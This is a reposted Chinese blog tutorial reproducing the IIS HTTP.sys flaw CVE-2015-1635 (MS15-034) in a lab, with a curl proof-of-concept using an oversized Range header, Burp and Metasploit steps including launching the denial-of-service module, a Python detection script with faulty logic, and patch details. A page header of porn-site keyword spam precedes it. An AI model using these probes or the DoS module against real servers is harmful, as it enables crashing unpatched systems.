日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现

發布時間:2023/12/31 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、漏洞描述

HTTP協議棧(HTTP.sys)存在遠程代碼執行漏洞,是由于HTTP.sys不正確的解析HTTP請求引起的,成功利用此漏洞的攻擊者可以執行系統賬戶上任意代碼。
攻擊者必須發送一個HTTP請求到受影響的系統去觸發這個漏洞,通過修改Windows HTTP棧處理請求更新漏洞地址。

主要存在Windows+IIS的環境下,任何安裝了微軟IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系統都受到這個漏洞的影響。

二、本次復現漏洞環境

靶機:Windows Server 2008
攻擊機:Kali

三、漏洞驗證

方法一:curl語法驗證

(1)查看能否訪問目標URL

(2)使用curl poc驗證

curl http://192.168.208.142/iisstart.htm -H "Host: 192.168.208.142" -H "Range: bytes=0-18446744073709551615"

(3)查看結果
如果出現416和Requested Range Not Satisfiable,則證明存在漏洞,反之,則不存在

方法二:Burpsuite驗證

在請求包中添加一行:Range: bytes=0-18446744073709551615
判斷方法同上

方法三:使用MSF驗證

(1)kali打開msf:msfconsole

(2)在msf中搜索利用模塊:search MS15-034或search CVE-2015-1635

(3)選擇payload模塊,帶有sanner的是驗證模塊,帶有dos的是攻擊模塊:use 1

(4)設置目標IP:set rhosts xxx.xxx.xxx.xxx
注:端口號如果非80,還要修改端口號

出現如下所示表示不存在:

方法四:python poc腳本

(1)腳本代碼

import requests import systry:print("正在測試http請求,請稍等...")url = "http://" + sys.argv[1]req = requests.get(url,timeout=5)target_server = req.headers['Server']if target_server.find("IIS"):payload = {"Range": "bytes=0-18446744073709551615"}req2 = requests.get(url, headers=payload)#print(req2.text)#print(req1.request.headers) # 輸出自定義的頭部信息if str(req2.content).find("Requested Range Not Satisfiable"):print("-------------------存在MS15-034漏洞-------------------")print("漏洞URL:"+url)else:print("Waring:不存在MS15-034漏洞")print("如有疑問,請手工測試...")else:print("-------------------服務器不是IIS-------------------") except:try:print("http請求失敗,正在測試http請求,請稍等...")url2 = "https://" + sys.argv[1]req = requests.get(url2, timeout=5)target_server = req.headers['Server']if target_server.find("IIS"):payload = {"Range": "bytes=0-18446744073709551615"}req2 = requests.get(url2, headers=payload)# print(req2.text)# print(req1.request.headers) # 輸出自定義的頭部信息if str(req2.content).find("Requested Range Not Satisfiable"):print("-------------------存在MS15-034漏洞-------------------")print("漏洞URL:" + url2)else:print("Waring:不存在MS15-034漏洞")print("如有疑問,請手工測試...")else:print("-------------------服務器不是IIS-------------------")print("-------------------目標無法連接-------------------")except:print("-------------------服務器不是IIS-------------------")

(2)測試

四、漏洞攻擊

選擇之前搜索到的dos模塊:use 0

五、漏洞修復

Microsoft已經為此發布了一個安全公告(MS15-034)以及相應補丁:
MS15-034:Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553)
鏈接:http://technet.microsoft.com/security/bulletin/MS15-034

總結

以上是生活随笔為你收集整理的CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。